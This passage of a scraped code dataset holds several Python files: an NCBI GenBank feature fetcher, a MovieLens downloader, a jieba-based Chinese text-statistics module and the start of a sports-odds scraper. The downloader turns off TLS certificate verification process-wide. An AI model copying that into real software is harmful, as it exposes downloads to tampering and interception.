{"api_name": "blazar.manager.exceptions.MalformedParameter", "line_number": 521, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 521, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.InvalidRange", "line_number": 524, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 524, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.MissingParameter", "line_number": 532, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 532, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.MalformedParameter", "line_number": 537, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 537, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 551, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 553, "usage_type": "call"}, {"api_name": "blazar.utils.plugins.convert_requirements", "line_number": 557, "usage_type": "call"}, {"api_name": "blazar.utils.plugins", "line_number": 557, 
"usage_type": "name"}, {"api_name": "blazar.db.api.reservable_device_get_all_by_queries", "line_number": 559, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 559, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_get_all_by_values", "line_number": 564, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 564, "usage_type": "name"}, {"api_name": "blazar.db.utils.get_free_periods", "line_number": 567, "usage_type": "call"}, {"api_name": "blazar.db.utils", "line_number": 567, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 578, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 582, "usage_type": "call"}, {"api_name": "blazar.db.api.device_allocation_get_all_by_values", "line_number": 598, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 598, "usage_type": "name"}, {"api_name": "blazar.status.reservation", "line_number": 606, "usage_type": "attribute"}, {"api_name": "blazar.status", "line_number": 606, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.NotEnoughHostsAvailable", "line_number": 607, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 607, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_create", "line_number": 621, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 621, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get", "line_number": 624, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 624, "usage_type": "name"}, {"api_name": "blazar.status.reservation", "line_number": 625, "usage_type": "attribute"}, {"api_name": "blazar.status", "line_number": 625, "usage_type": "name"}, {"api_name": "blazar.manager.exceptions.NotEnoughHostsAvailable", "line_number": 631, "usage_type": "call"}, {"api_name": "blazar.manager.exceptions", "line_number": 631, "usage_type": "name"}, {"api_name": "blazar.db.api.device_allocation_destroy", "line_number": 634, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 634, "usage_type": "name"}, {"api_name": "blazar.db.utils.get_reserved_periods", "line_number": 650, "usage_type": "call"}, {"api_name": "blazar.db.utils", "line_number": 650, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 654, "usage_type": "call"}, {"api_name": "blazar.utils.plugins.convert_requirements", "line_number": 680, "usage_type": "call"}, {"api_name": "blazar.utils.plugins", "line_number": 680, "usage_type": "name"}, {"api_name": "blazar.db.api.device_get_all_by_queries", "line_number": 682, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 682, "usage_type": "name"}, {"api_name": "blazar.db.api.device_list", "line_number": 684, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 684, "usage_type": "name"}, {"api_name": "blazar.plugins.monitor.GeneralMonitorPlugin", "line_number": 687, "usage_type": "attribute"}, {"api_name": "blazar.plugins.monitor", "line_number": 687, "usage_type": "name"}, {"api_name": "blazar.db.utils.get_reservations_by_device_ids", "line_number": 704, "usage_type": "call"}, {"api_name": "blazar.db.utils", "line_number": 704, "usage_type": "name"}, {"api_name": "blazar.db.api.unreservable_device_get_all_by_queries", "line_number": 709, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 709, "usage_type": "name"}, {"api_name": "blazar.db.api.device_update", "line_number": 728, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 728, 
"usage_type": "name"}, {"api_name": "blazar.db.api.device_get_all_by_filters", "line_number": 737, "usage_type": "call"}, {"api_name": "blazar.db.api", "line_number": 737, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 739, "usage_type": "call"}]} +{"seq_id": "566549998", "text": "# fetch_features.py version 1.0\n# Created by Ivan Munoz-Gutierrez\n# Date 2020-07-26\n#\n# Function:\n# This program needs the Biophyton and cs50 modules. If you don't have those\n# modules, please visit https://biopython.org/ and\n# https://github.com/cs50/python-cs50 for more information.\n#\n# The program fetches information from a list of Genebank accession numbers or\n# a list of BioSample numbers. The program enters the nuccore database and\n# collects all the features of the corresponding list of accession numbers.\n# When you enter a list of accession numbers you have two options. The first\n# option is to get the features of the provided accession list. The second one\n# is to get the features of all the accession numbers associated with an\n# specific BioSample number. In this second option, the program gets the\n# BioSample number of every accession number in the list, accesses the nuccore\n# database with the BioSample number and selects the most updated information\n# of every molecule (chromosome and/or plasmid(s)).\n#\n# You can create one list of accession numbers in Excel by saving the file as\n# txt. The list needs a header, if it doesn't have one the first accession\n# numbers is not going to be included.\n#\n# Usage: python fetch_features.py\n\n#############################################################################\n# Importing relevant modules #\n#############################################################################\nfrom Bio import Entrez\nfrom Bio import SeqIO\nfrom database import *\nimport csv\nimport sys\nimport cs50\n\n#############################################################################\n# Getting input from the user #\n#############################################################################\n# Checking the correct useage of the program\nif len(sys.argv) != 1:\n sys.exit(\"usage: python fetch_features.py\")\n\n# Getting type of input data.\nwhile True:\n type_list = cs50.get_string(\n \"Does your list have accession numbers or \"\n \"biosample numbers (accession or biosample)? \")\n type_list = type_list.lower()\n if type_list == 'accession' or type_list == 'biosample':\n break\n\n# Asking about getting data from all BioSample related acc numbers\nwhile True:\n get_biosample = cs50.get_string(\n \"If you have a list of accession numbers, do you want to get the \"\n \"most updated features of \\nall the related accession numbers that \"\n \"belong to the same BioSample (yes or no)? 
\")\n get_biosample = get_biosample.lower()\n if get_biosample == 'yes' or get_biosample == 'no':\n break\n\n# Gettin name of infile.txt\ninfile = cs50.get_string('Provide the name of your infile.txt: ')\n\n# IMPORTANT: always provide your email address to GenBank\nemail_address = cs50.get_string(\"Provide your email address to the NCBI: \")\nEntrez.email = email_address\n\n# Opening infile.txt\nwith open(infile, 'r') as reader:\n\n # Skip the header\n next(reader)\n\n # Creating a list of accession numbers\n list_accessions = reader.readlines()\n\n# Counting the number of results (number of sequences)\ncount = len(list_accessions)\nprint(f\"Number of requested sequences: {count}\")\n\n# Creating batches of acc numbers for the specified case in the if statement\nif type_list == 'accession' and get_biosample == 'no':\n # Number of sequences to be requested by batch.\n # A batch of 500 is the max that we can request.\n batch_size = 100\n\n # This is going to be a list of strings containg the batches of requested\n # accession numbers, i.e. every string in the list is going to have in this\n # case 500 accesion numbers separaded by comas.\n submission_list = []\n\n # Counter to access the list_accessions\n counter_accessions = 0\n\n # Loop to create the list of accession numbers by batches of 500\n for start in range(0, count, batch_size):\n end = min(count, start + batch_size)\n # This list is going to save temporarily the batch of accession numbers\n # that are goingo to be converted into a string separed by commas\n set_list = []\n for set in range(start, end):\n set_list.append(list_accessions[counter_accessions].\n replace('\\n', ''))\n counter_accessions += 1\n # Converting the list into string\n set_list = ','.join(set_list)\n submission_list.append(set_list)\n\n#############################################################################\n# Working with GenBank #\n#############################################################################\n# Number to keep track set of sequences (or batches) and the sequences,\n# it is important in case the connection to NCBI is interrupted so we can\n# know where to continue downloading\nset, seq_counter = 1, 1\n\n# Opening our results file to write the fetched data in csv format\nwith open(\"results.csv\", \"w\") as results:\n # Field names or headers in the csv table\n fields = [\"set_batch\", \"counter\", \"description\", \"accession\", \"size\",\n \"molecule\", \"mod_date\", \"topology\", \"mol_type\", \"organism\",\n \"strain\", \"isolation_source\", \"host\", \"plasmid\", \"country\",\n \"lat_lon\", \"collection_date\", \"note\", \"serovar\", \"collected_by\",\n \"genotype\", \"BioProject\", \"BioSample\", \"Assem_Method\",\n \"Gen_Coverage\", \"Seq_Technol\"]\n\n # Create DictWriter\n writer = csv.DictWriter(results, fields)\n\n # Writing headers\n writer.writeheader()\n\n ###########################################\n # Workig with a list of accession numbers #\n ###########################################\n if type_list == 'accession' and get_biosample == 'no':\n # Declaring end\n end = 0\n\n # Fetching the information from GenBank by batches\n for submission in range(len(submission_list)):\n start = end\n # submission_list is a list of accession numbers separated by\n # commas. 
Therefore, the number of commas indicates the number of\n            # accession numbers.\n            end = end + submission_list[submission].count(',') + 1\n\n            # Printing download batch record\n            print(\"Going to download record %i to %i\" % (start + 1, end))\n\n            # Posting the submission_list.\n            # Because we are requesting information from a huge list of acc\n            # numbers, we have to use the \".epost\" function which uploads a\n            # list of UIs (acc numbers) for use in subsequent searches.\n            # From .epost we can get the QueryKey and the WebEnv which define\n            # our history session and can be used to perform searches of data.\n            posting = Entrez.epost('nuccore', id=submission_list[submission])\n            search_results = Entrez.read(posting)\n\n            # Copying cookie \"WebEnv\" and query \"QueryKey\" from our history\n            # session to keep track of our batch fetching.\n            # WebEnv -> Web environment string returned from a previous\n            # ESearch, EPost or ELink call; QueryKey -> Integer query key\n            # returned by a previous ESearch, EPost or ELink call\n            webenv = search_results[\"WebEnv\"]\n            query_key = search_results[\"QueryKey\"]\n\n            # Getting the batch information\n            # db -> database, nuccore -> nucleotide, rettype -> retrieval type\n            # retmode -> determines the format of the return output\n            # retstart -> sequential index of the first UID in the retrieved\n            # set to be shown in the XML output\n            # retmax -> total number of UIDs from the retrieved set to be shown\n            # in the XML output\n            # idtype -> specifies the type of identifier to return for sequence\n            # databases, acc -> accession number\n            fetch_handle = Entrez.efetch(\n                db=\"nuccore\",\n                rettype=\"gb\",\n                retmode=\"text\",\n                retstart=0,\n                retmax=batch_size,\n                webenv=webenv,\n                query_key=query_key,\n                idtype=\"acc\"\n            )\n\n            # Parsing the data fetched from NCBI\n            records = parser(fetch_handle, set, seq_counter)\n\n            # Recording the set number and the sequences downloaded\n            set += 1\n            seq_counter = records[1]\n\n            # Saving the retrieved data in the csv file\n            for i in range(len(records[0])):\n                writer.writerow(records[0][i])\n\n            # Closing fetch_handle\n            fetch_handle.close()\n\n    ###################################################################\n    # Working with a list of accession numbers and getting all related #\n    # BioSample associated accession numbers and their features #\n    ###################################################################\n    elif type_list == 'accession' and get_biosample == 'yes':\n        seq_counter = 1\n\n        # Iterating over the list of accession numbers\n        for query in range(len(list_accessions)):\n            # Number to keep track of the set of sequences (or batches) and\n            # the sequences; it is important in case the connection to NCBI is\n            # interrupted so we can know where to continue downloading\n            set = query + 1\n\n            # Getting the BioSample number of the requested accession number.\n            # BioSample_list() takes two arguments, a list of accession\n            # numbers and the email address of the user\n            biosample_number = BioSample_list(list_accessions[query],\n                                              email_address)\n\n            # Using \".esearch\" to find the information.\n            # Also we have to implement \"usehistory\" to get the cookie and\n            # query key.\n            # db -> database to search, term -> Entrez text query\n            search_handle = Entrez.esearch(db=\"nucleotide\",\n                                           term=biosample_number,\n                                           usehistory=\"y\")\n\n            # Copying the information into memory\n            search_results = Entrez.read(search_handle)\n\n            # Closing the handle\n            search_handle.close()\n\n            # Counting the number of results (number of sequences)\n            count = int(search_results[\"Count\"])\n            print(f\"Number of 
requested sequences from BioSample: {count}\")\n\n            # Copying cookie \"WebEnv\" and query \"QueryKey\" from history to keep\n            # track of our batch fetching.\n            # WebEnv -> Web environment string returned from a previous\n            # ESearch, EPost or ELink call.\n            # QueryKey -> Integer query key returned by a previous ESearch,\n            # EPost or ELink call\n            webenv = search_results[\"WebEnv\"]\n            query_key = search_results[\"QueryKey\"]\n\n            # Number of sequences to be requested by batch.\n            # A batch of 500 is the max that we can request.\n            batch_size = 500\n\n            # I need to think about how to clean features of a BioSample number\n            # that has more than 500 records\n            # TODO\n\n            # Fetching the information from GenBank by batches\n            for start in range(0, count, batch_size):\n                end = min(count, start + batch_size)\n\n                # Printing download batch record\n                print(f\"Going to download record {start + 1} to {end} \"\n                      f\"from set {query + 1}\")\n\n                # Getting the batch information\n                # db -> database, nuccore -> nucleotide, rettype -> retrieval\n                # type, retmode -> determines the format of the return output\n                # retstart -> sequential index of the first UID in the\n                # retrieved set to be shown in the XML output, retmax -> total\n                # number of UIDs from the retrieved set to be shown in the\n                # XML output, idtype -> specifies the type of identifier to\n                # return for sequence databases, acc -> accession number\n                fetch_handle = Entrez.efetch(\n                    db=\"nuccore\",\n                    rettype=\"gb\",\n                    retmode=\"text\",\n                    retstart=start,\n                    retmax=batch_size,\n                    webenv=webenv,\n                    query_key=query_key,\n                    idtype=\"acc\"\n                )\n\n                # Parsing the data fetched from NCBI\n                records = parser(fetch_handle, set, seq_counter)\n\n                # Recording the number of sequences downloaded\n                seq_counter = records[1]\n\n                # Using database.py to clean data and obtain the most updated\n                # information.\n                # clean_features() returns a list of dictionaries\n                updated_features = clean_features(records[0])\n\n                # Saving the updated retrieved data in the csv file\n                for i in range(len(updated_features)):\n                    writer.writerow(updated_features[i])\n\n                print(f\"Number of sequences saved after processing: \"\n                      f\"{len(updated_features)}\")\n\n                # Closing handle\n                fetch_handle.close()\n\n    ############################################\n    # Working with a list of BioSample numbers #\n    ############################################\n    else:\n        length_acc_list = len(list_accessions)\n\n        # Fetching the information from GenBank\n        for submission in range(length_acc_list):\n\n            # Printing download record\n            print(f\"Going to download record {submission + 1} \"\n                  f\"of {length_acc_list}\")\n\n            # Searching for the BioSample accession number. 
We need usehistory\n            # to get the QueryKey and the WebEnv which define our history\n            # session and can be used to perform searches of data.\n            search_handle = Entrez.esearch(db=\"nuccore\",\n                                           term=list_accessions[submission],\n                                           usehistory=\"y\")\n            search_results = Entrez.read(search_handle)\n\n            # Copying cookie \"WebEnv\" and query \"QueryKey\" from our history\n            # session.\n            # WebEnv -> Web environment string returned from a previous\n            # ESearch, EPost or ELink call; QueryKey -> Integer query key\n            # returned by a previous ESearch, EPost or ELink call\n            webenv = search_results[\"WebEnv\"]\n            query_key = search_results[\"QueryKey\"]\n\n            # Getting information\n            # db -> database, nuccore -> nucleotide, rettype -> retrieval type,\n            # retmode -> determines the format of the return output,\n            # retstart -> sequential index of the first UID in the retrieved\n            # set to be shown in the XML output, retmax -> total number of\n            # UIDs from the retrieved set to be shown in the XML output,\n            # idtype -> specifies the type of identifier to return for sequence\n            # databases, acc -> accession number\n            fetch_handle = Entrez.efetch(\n                db=\"nuccore\",\n                rettype=\"gb\",\n                retmode=\"text\",\n                retstart=0,\n                retmax=1,\n                webenv=webenv,\n                query_key=query_key,\n                idtype=\"acc\"\n            )\n\n            # Parsing the data fetched from NCBI\n            records = parser(fetch_handle, submission + 1, submission + 1)\n\n            # Saving the retrieved data in the csv file\n            for i in range(len(records[0])):\n                writer.writerow(records[0][i])\n\n            # Closing fetch_handle\n            fetch_handle.close()\n\n# If everything was done OK print Done and exit the program\nprint(\"\"\"Done!\nYou should have a results.csv file in your folder\"\"\")\n\nsys.exit(0)\n", "sub_path": "fetch_features.py", "file_name": "fetch_features.py", "file_ext": "py", "file_size_in_byte": 15988, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.argv", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 42, "usage_type": "call"}, {"api_name": "cs50.get_string", "line_number": 46, "usage_type": "call"}, {"api_name": "cs50.get_string", "line_number": 55, "usage_type": "call"}, {"api_name": "cs50.get_string", "line_number": 64, "usage_type": "call"}, {"api_name": "cs50.get_string", "line_number": 67, "usage_type": "call"}, {"api_name": "Bio.Entrez.email", "line_number": 68, "usage_type": "attribute"}, {"api_name": "Bio.Entrez", "line_number": 68, "usage_type": "name"}, {"api_name": "csv.DictWriter", "line_number": 130, "usage_type": "call"}, {"api_name": "Bio.Entrez.epost", "line_number": 159, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 159, "usage_type": "name"}, {"api_name": "Bio.Entrez.read", "line_number": 160, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 160, "usage_type": "name"}, {"api_name": "Bio.Entrez.efetch", "line_number": 179, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 179, "usage_type": "name"}, {"api_name": "Bio.Entrez.esearch", "line_number": 228, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 228, "usage_type": "name"}, {"api_name": "Bio.Entrez.read", "line_number": 233, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 233, "usage_type": "name"}, {"api_name": "Bio.Entrez.efetch", "line_number": 275, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 275, "usage_type": "name"}, {"api_name": "Bio.Entrez.esearch", "line_number": 323, "usage_type": "call"}, {"api_name": 
"Bio.Entrez", "line_number": 323, "usage_type": "name"}, {"api_name": "Bio.Entrez.read", "line_number": 326, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 326, "usage_type": "name"}, {"api_name": "Bio.Entrez.efetch", "line_number": 344, "usage_type": "call"}, {"api_name": "Bio.Entrez", "line_number": 344, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 369, "usage_type": "call"}]} +{"seq_id": "6465440", "text": "import os\nimport ssl\nimport wget\nimport zipfile\n\nimport numpy as np\nimport pandas as pd\n\n\ndef download_and_prepare(name, path):\n if name == \"movielens-small\":\n print(f\"Preparing dataset {name}...\")\n # Check if data has been extracted and if not download extract it\n if (os.path.exists(os.path.join(path, \"ml-latest-small\"))):\n print(f\"Dataset {name} already extracted.\")\n else:\n print(f\"Downloading dataset {name}...\")\n ssl._create_default_https_context = ssl._create_unverified_context\n url = \"https://files.grouplens.org/datasets/movielens/ml-latest-small.zip\"\n wget.download(url, path)\n print(f\"Extracting dataset {name}...\")\n with zipfile.ZipFile(os.path.join(path, \"ml-latest-small.zip\"), 'r') as zip_ref:\n zip_ref.extractall(path)\n\n # Read dataset with pandas\n ratings = pd.read_csv(os.path.join(path, 'ml-latest-small', 'ratings.csv'))\n print(f\"{len(ratings)} entries read.\")\n r_matrix = ratings.pivot(index='userId', columns='movieId', values='rating').fillna(0)\n\n return np.array(r_matrix) # for performance reasons we only take every 2nd element along each axis\n\n else:\n raise ValueError\n\n", "sub_path": "Detection and Pattern Recognition/Ex_1_Introduction/datasets.py", "file_name": "datasets.py", "file_ext": "py", "file_size_in_byte": 1267, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.exists", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "ssl._create_default_https_context", "line_number": 18, "usage_type": "attribute"}, {"api_name": "ssl._create_unverified_context", "line_number": 18, "usage_type": "attribute"}, {"api_name": "wget.download", "line_number": 20, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "619870833", "text": "\"\"\"\n This file is about the statistical analysis on the sentences.\n\n We basically specify that:\n '我们爱您' is a string;\n Both '我' and '们' are the units of the string '我们爱您'.\n At the same time, we specify that:\n '我' is a char;\n '我们' is a phrase;\n '我们爱您' is a sentence;\n '1' is a digit;\n 'a' is a letter;\n '!' 
is a punctuation mark.\n    Besides, special_words refer to the following:\n        Word/Flag:\n        auxiliary word (助词)/u\n        interjection (叹词)/e\n        modal particle (语气词)/y\n        onomatopoeia (拟声词)/o\n\n    Here is the list of the functions:\n        stc_len -- sentence length\n        stc_phrase_count -- phrase frequency count\n        stc_char_count -- character frequency count\n        stc_digit_count -- usage frequency of Arabic digits (0-9)\n        stc_letter_count -- usage frequency of English letters (upper and lower case)\n        stc_punct_count -- usage frequency of punctuation marks\n        stc_special_words_count -- usage frequency of the special words above\n        stc_pop_phrase_count1 -- usage frequency of popular phrases (using jieba segmentation)\n        stc_pop_phrase_count2 -- usage frequency of popular phrases (using regular expressions)\n\"\"\"\n\nimport jieba\nimport jieba.posseg\nimport string\nimport re\nfrom collections import Counter\n\n# stc == sentence\ndef stc_len(sentence):\n    return len(sentence)\n\ndef stc_phrase_count(sentence):\n    phrase_list = jieba.lcut(sentence, cut_all = False)\n    cnt = Counter(phrase_list)\n    return dict(cnt)\n\ndef stc_char_count(sentence):\n    unit_list = list(sentence)\n    cnt = Counter(unit_list)\n    return dict(cnt)\n\n# This counts the digits from 0 to 9;\n# digit_num contains every digit from 0 to 9, and a digit's count may be 0.\ndef stc_digit_count(sentence):\n    #initialize\n    digit_num = dict(Counter(string.digits))\n    for d in digit_num:\n        digit_num[d] -= 1\n    #process\n    unit_list = list(sentence)\n    for u in unit_list:\n        if u in digit_num:\n            digit_num[u] += 1\n    return digit_num\n\n# This counts the letters from a to z and A to Z;\n# letter_num contains every letter from a to z and A to Z, and a letter's count may be 0.\ndef stc_letter_count(sentence):\n    #initialize\n    letter_num = dict(Counter(string.ascii_letters))\n    for l in letter_num:\n        letter_num[l] -= 1\n    #process\n    unit_list = list(sentence)\n    for u in unit_list:\n        if u in letter_num:\n            letter_num[u] += 1\n    return letter_num\n\n# This counts the punctuation characters listed in the local file common_zh_punct;\n# punct_num contains all the punctuation marks mentioned above, and a mark's count may be 0.\ndef stc_punct_count(sentence):\n    #initialize\n    f = open('common_zh_punct', 'r', encoding='UTF-8')\n    punct_num = dict(Counter(f.readline().encode('utf-8').decode('utf-8-sig')))\n    for p in punct_num:\n        punct_num[p] -= 1\n    #process\n    unit_list = list(sentence)\n    for u in unit_list:\n        if u in punct_num:\n            punct_num[u] += 1\n    f.close()\n    return punct_num\n\n# This counts the special words;\n# special_words_num doesn't contain all the special words in the world.\ndef stc_special_words_count(sentence):\n    words = jieba.posseg.lcut(sentence)\n    special_words_num = {}\n    for w in words:\n        if w.flag[0] == 'u' or w.flag[0] == 'e' or w.flag[0] == 'y' or w.flag[0] == 'o':\n            if w.word not in special_words_num:\n                special_words_num[w.word] = 1\n            else:\n                special_words_num[w.word] += 1\n    return special_words_num\n\n# This counts the popular phrases using jieba;\n# pop_phrase_num contains all the popular phrases we collected manually,\n# but not every popular phrase in the world.\ndef stc_pop_phrase_count1(sentence):\n    # initialize\n    f = open('common_pop_phrase', 'r', encoding='UTF-8')\n    lines = f.readlines()\n    pop_phrases = []\n    for i in lines:\n        pop_phrases.append((i.encode('utf-8').decode('utf-8-sig'))[:-1])\n    pop_phrase_num = dict(Counter(pop_phrases))\n    for p in pop_phrase_num:\n        pop_phrase_num[p] -= 1\n    # process\n    phrase_list = jieba.lcut(sentence, cut_all=False)\n    print(phrase_list)\n    for p in phrase_list:\n        if p in pop_phrase_num:\n            pop_phrase_num[p] += 1\n    f.close()\n    return pop_phrase_num\n\n# This counts the popular phrases using regular expressions;\n# pop_phrase_num contains all the popular phrases we collected manually,\n# but not every popular phrase in the world.\ndef stc_pop_phrase_count2(sentence):\n    # initialize\n    f = open('common_pop_phrase', 'r', 
encoding='UTF-8')\n    lines = f.readlines()\n    pop_phrases = []\n    for i in lines:\n        pop_phrases.append((i.encode('utf-8').decode('utf-8-sig'))[:-1])\n    pop_phrase_num = dict(Counter(pop_phrases))\n    for p in pop_phrase_num:\n        pop_phrase_num[p] -= 1\n    # process\n    for p in pop_phrase_num:\n        p0 = p\n        pattern = re.compile(p0)\n        pop_phrase_num[p] += len(pattern.findall(sentence))\n    f.close()\n    return pop_phrase_num\n\nif __name__ == '__main__':\n    print(stc_len('你好,在吗?'))\n    print(stc_phrase_count('我今天想吃一个苹果,然后看部film,不知道你是怎么想的呢?哈哈~'))\n    print(stc_char_count('我今天想吃一个苹果,然后看部film,不知道你是怎么想的呢?哈哈~'))\n    print(stc_digit_count('121221121221,321312434,42432'))\n    print(stc_letter_count('dadadadkasjdkladjkwl'))\n    print(stc_punct_count(',。、'))\n    print(stc_special_words_count('今天的天气好差劲噢~'))\n    print(stc_pop_phrase_count1('如果我有freestyle的话,惊不惊喜?')) #won't find \"惊不惊喜\"\n    print(stc_pop_phrase_count2('如果我有freestyle的话,惊不惊喜?')) #will find \"惊不惊喜\"\n\n", "sub_path": "statistical_analysis/statistical_analysis.py", "file_name": "statistical_analysis.py", "file_ext": "py", "file_size_in_byte": 5645, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "jieba.lcut", "line_number": 42, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 43, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 48, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 55, "usage_type": "call"}, {"api_name": "string.digits", "line_number": 55, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 69, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 69, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 84, "usage_type": "call"}, {"api_name": "jieba.posseg.lcut", "line_number": 98, "usage_type": "call"}, {"api_name": "jieba.posseg", "line_number": 98, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 118, "usage_type": "call"}, {"api_name": "jieba.lcut", "line_number": 122, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 140, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "599217139", "text": "import datetime\n\nimport requests\nimport pytz\n\nfrom .fivethirtyeight_parser import NBA_TEAM_NAMES, MLB_TEAM_NAMES\n\n\nMYBOOKIE_URL = (\n    \"https://mybookie.ag/wp-content/plugins/\"\n    \"wp_plugin_sportsbook_guest/lines.php\"\n)\n\n\ndef parse_nba_game_data():\n    \"\"\"\n    Parse NBA game data from MyBookie website.\n    \"\"\"\n    # leagues specifies the id of the league to retrieve data from (nba=3)\n    form_data = {\"leagues\": 3, \"bookID\": 35}\n    json_data = requests.post(MYBOOKIE_URL, data=form_data).json()\n    league_id = json_data[0][\"id_league\"]\n    sport_id = json_data[0][\"id_sport\"]\n    content = json_data[0][\"content\"]\n    cleaned_data = []\n    for item in content:\n        # Not all items in content contain game data. Skip those that don't.\n        game_id = item.get(\"id_game\")\n        if game_id is None:\n            print(\"No game id found. 
Skipping.\")\n continue\n else:\n print(\"Parsing game with id\", game_id)\n\n away_team_name = item[\"visitor_team\"]\n home_team_name = item[\"home_team\"]\n\n away_odds = item[\"lines\"][0][\"visitor_odds_t\"]\n home_odds = item[\"lines\"][0][\"home_odds_t\"]\n\n if away_odds == '':\n away_odds = 0\n\n if home_odds == '':\n home_odds = 0\n\n game_cleaned = dict(\n game_id=game_id,\n away_team_name = away_team_name,\n home_team_name = home_team_name,\n game_date=item[\"game_date\"],\n game_time=item[\"game_time\"],\n game_datetime=item[\"game_date_time\"][\"date\"],\n game_tz=item[\"game_date_time\"][\"timezone\"],\n away_odds=away_odds,\n home_odds=home_odds,\n over_total=item[\"lines\"][0][\"over_total\"],\n over_odds_total=item[\"lines\"][0][\"over_odds_total\"],\n under_total=item[\"lines\"][0][\"under_total\"],\n under_odds_total=item[\"lines\"][0][\"under_odds_total\"],\n away_spread=item[\"lines\"][0][\"visitor_spread_t\"],\n away_spread_odds=item[\"lines\"][0][\"visitor_spread_odds_t\"],\n home_spread=item[\"lines\"][0][\"home_spread_t\"],\n home_spread_odds=item[\"lines\"][0][\"home_spread_odds_t\"]\n )\n cleaned_data.append(game_cleaned)\n return cleaned_data\n\n\ndef parse_mlb_game_data():\n \"\"\"\n Parse MLB game data from MyBookie website.\n \"\"\"\n # leagues specifies the id of the league to retrieve data from (mlb=5)\n form_data = {\"leagues\": 5, \"bookID\": 35}\n json_data = requests.post(MYBOOKIE_URL, data=form_data).json()\n league_id = json_data[0][\"id_league\"]\n sport_id = json_data[0][\"id_sport\"]\n content = json_data[0][\"content\"]\n cleaned_data = []\n for item in content:\n game_id = item.get(\"id_game\")\n if game_id is None:\n print(\"No game id found. Skipping.\")\n continue\n else:\n print(\"Parsing game with id\", game_id)\n\n away_team_code, *away_name = item[\"visitor_team\"].split(\" \")\n home_team_code, *home_name = item[\"home_team\"].split(\" \")\n\n # TODO: Make this not dumb\n if away_team_code == \"SFO\":\n away_team_code = \"SF\"\n\n if home_team_code == \"SFO\":\n home_team_code = \"SF\"\n\n if away_team_code == \"NY\":\n away_team_code = \"NYM\"\n\n if home_team_code == \"NY\":\n home_team_code = \"NYM\"\n\n if away_team_code == \"WAS\":\n away_team_code = \"WSH\"\n\n if home_team_code == \"WAS\":\n home_team_code = \"WSH\"\n\n if away_team_code == \"SDG\":\n away_team_code = \"SD\"\n\n if home_team_code == \"SDG\":\n home_team_code = \"SD\"\n\n if away_team_code == \"LA\":\n if \"DODGERS\" in away_name:\n away_team_code = \"LAD\"\n elif \"ANGELS\" in away_name:\n away_team_code = \"LAA\"\n\n if home_team_code == \"LA\":\n if \"DODGERS\" in home_name:\n home_team_code = \"LAD\"\n elif \"ANGELS\" in home_name:\n home_team_code = \"LAA\"\n\n if away_team_code == \"CHI\":\n away_team_code = \"CHW\"\n\n if home_team_code == \"CHI\":\n home_team_code = \"CHW\"\n\n if away_team_code == \"TAM\":\n away_team_code = \"TB\"\n\n if home_team_code == \"TAM\":\n home_team_code = \"TB\"\n\n if away_team_code == \"KAN\":\n away_team_code = \"KC\"\n\n if home_team_code == \"KAN\":\n 